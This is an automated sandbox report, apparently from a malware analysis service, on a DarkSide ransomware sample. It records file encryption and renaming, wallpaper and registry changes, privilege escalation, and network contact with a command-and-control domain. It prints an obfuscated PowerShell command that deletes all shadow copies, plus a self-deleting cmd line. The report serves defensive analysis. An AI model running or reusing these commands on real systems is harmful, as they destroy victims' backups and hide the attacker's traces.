SHA512 62b5aa138f6b1f469a24ca589b4855610a0e29d43ddb7095b1f307a21823a8061aed9ff5b9668389c944cc1fc2aaf4369a8bfc81bd83c55f81bfb8407b4217c7

memory/1364-72-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-26 12:57

Reported

2021-07-26 13:33

Platform

win10v20210408

Max time kernel

99s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\BlockConvert.png => C:\Users\Admin\Pictures\BlockConvert.png.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File renamed C:\Users\Admin\Pictures\RestartEdit.raw => C:\Users\Admin\Pictures\RestartEdit.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File renamed C:\Users\Admin\Pictures\ResolveRegister.tif => C:\Users\Admin\Pictures\ResolveRegister.tif.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResolveRegister.tif.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File renamed C:\Users\Admin\Pictures\SplitRedo.png => C:\Users\Admin\Pictures\SplitRedo.png.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File renamed C:\Users\Admin\Pictures\JoinOut.tif => C:\Users\Admin\Pictures\JoinOut.tif.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\RestartEdit.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockConvert.png.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File renamed C:\Users\Admin\Pictures\MergeUnregister.tiff => C:\Users\Admin\Pictures\MergeUnregister.tiff.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\JoinOut.tif.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SplitRedo.png.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File renamed C:\Users\Admin\Pictures\StopEdit.raw => C:\Users\Admin\Pictures\StopEdit.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopEdit.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File renamed C:\Users\Admin\Pictures\CompleteDisconnect.tiff => C:\Users\Admin\Pictures\CompleteDisconnect.tiff.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File renamed C:\Users\Admin\Pictures\CopyReset.raw => C:\Users\Admin\Pictures\CopyReset.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\CopyReset.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\21b2020d.BMP" C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\21b2020d.BMP" C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\21b2020d.ico" C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d\ = "21b2020d" C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe

"C:\Users\Admin\AppData\Local\Temp\17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.sample.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\17139A~1.EXE >> NUL

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 securebestapp20.com udp
N/A 185.105.109.19:443 securebestapp20.com tcp
N/A 8.8.8.8:53 106.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 1.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 110.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 104.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 74.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 72.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 69.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 87.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 66.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 115.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 7.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 6.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 128.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 127.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 124.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 125.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 126.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 121.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 123.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 120.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 122.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 118.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 119.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 117.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 113.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 116.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 112.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 114.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 108.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 107.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 105.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 102.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 100.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 99.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 103.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 101.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 98.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 97.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 96.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 95.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 94.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 93.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 92.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 91.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 90.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 89.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 88.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 86.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 109.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 84.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 83.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 82.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 81.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 80.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 79.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 77.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 78.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 76.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 75.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 70.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 73.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 71.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 67.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 65.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 111.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 85.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 68.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 64.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 62.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 53.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 55.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 54.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 48.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 50.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 49.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 47.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 45.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 44.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 42.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 43.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 40.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 39.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 36.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 35.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 32.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 29.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 28.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 27.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 26.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 20.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 16.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 18.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 15.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 13.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 11.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 10.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 61.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 12.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 17.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 19.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 21.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 22.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 23.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 24.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 30.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 25.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 31.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 33.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 34.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 37.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 38.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 41.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 46.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 51.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 52.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 57.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 56.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 58.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 59.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 60.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 63.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 2.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 9.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 8.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 4.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 3.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 5.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 180.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 173.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 161.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 154.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 137.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 129.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 146.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 145.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 148.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 147.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 193.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 181.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 191.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 149.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 150.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 151.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 153.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 156.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 155.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 157.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 152.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 159.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 158.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 162.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 165.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 163.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 164.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 166.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 168.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 167.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 169.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 170.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 172.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 175.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 174.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 171.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 177.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 178.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 179.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 176.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 182.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 183.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 184.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 185.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 186.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 187.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 189.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 188.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 190.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 192.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 131.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 130.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 133.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 134.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 132.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 135.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 136.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 139.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 141.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 138.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 140.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 142.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 144.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 143.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 194.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 195.0.10.10.in-addr.arpa udp
N/A 185.105.109.19:443 securebestapp20.com tcp

Files

memory/3280-114-0x0000000000000000-mapping.dmp

memory/3280-119-0x0000019CBF450000-0x0000019CBF451000-memory.dmp

memory/3280-123-0x0000019CC0090000-0x0000019CC0091000-memory.dmp

memory/3280-124-0x0000019CBF4C0000-0x0000019CBF4C2000-memory.dmp

memory/3280-125-0x0000019CBF4C3000-0x0000019CBF4C5000-memory.dmp

memory/3280-134-0x0000019CBF4C6000-0x0000019CBF4C8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0adfbebc578f5fc765e2f9438fdfc340
SHA1 4022910386164e5b28234e79e2521acf7a2a6890
SHA256 dc4c9439c3fbf7853a742bcdc020f52191006065c10dea5537bf446c3969f3c5
SHA512 b5db506d3e926df28ddbd5067e9efbc8b5ba74c7a8f3ff2cbeb2a862e83a5c587ec1a2ad375347d5f91defbada7d23bf159ee6a2bd2c23698cb086679d303ab5

memory/4464-142-0x0000000000000000-mapping.dmp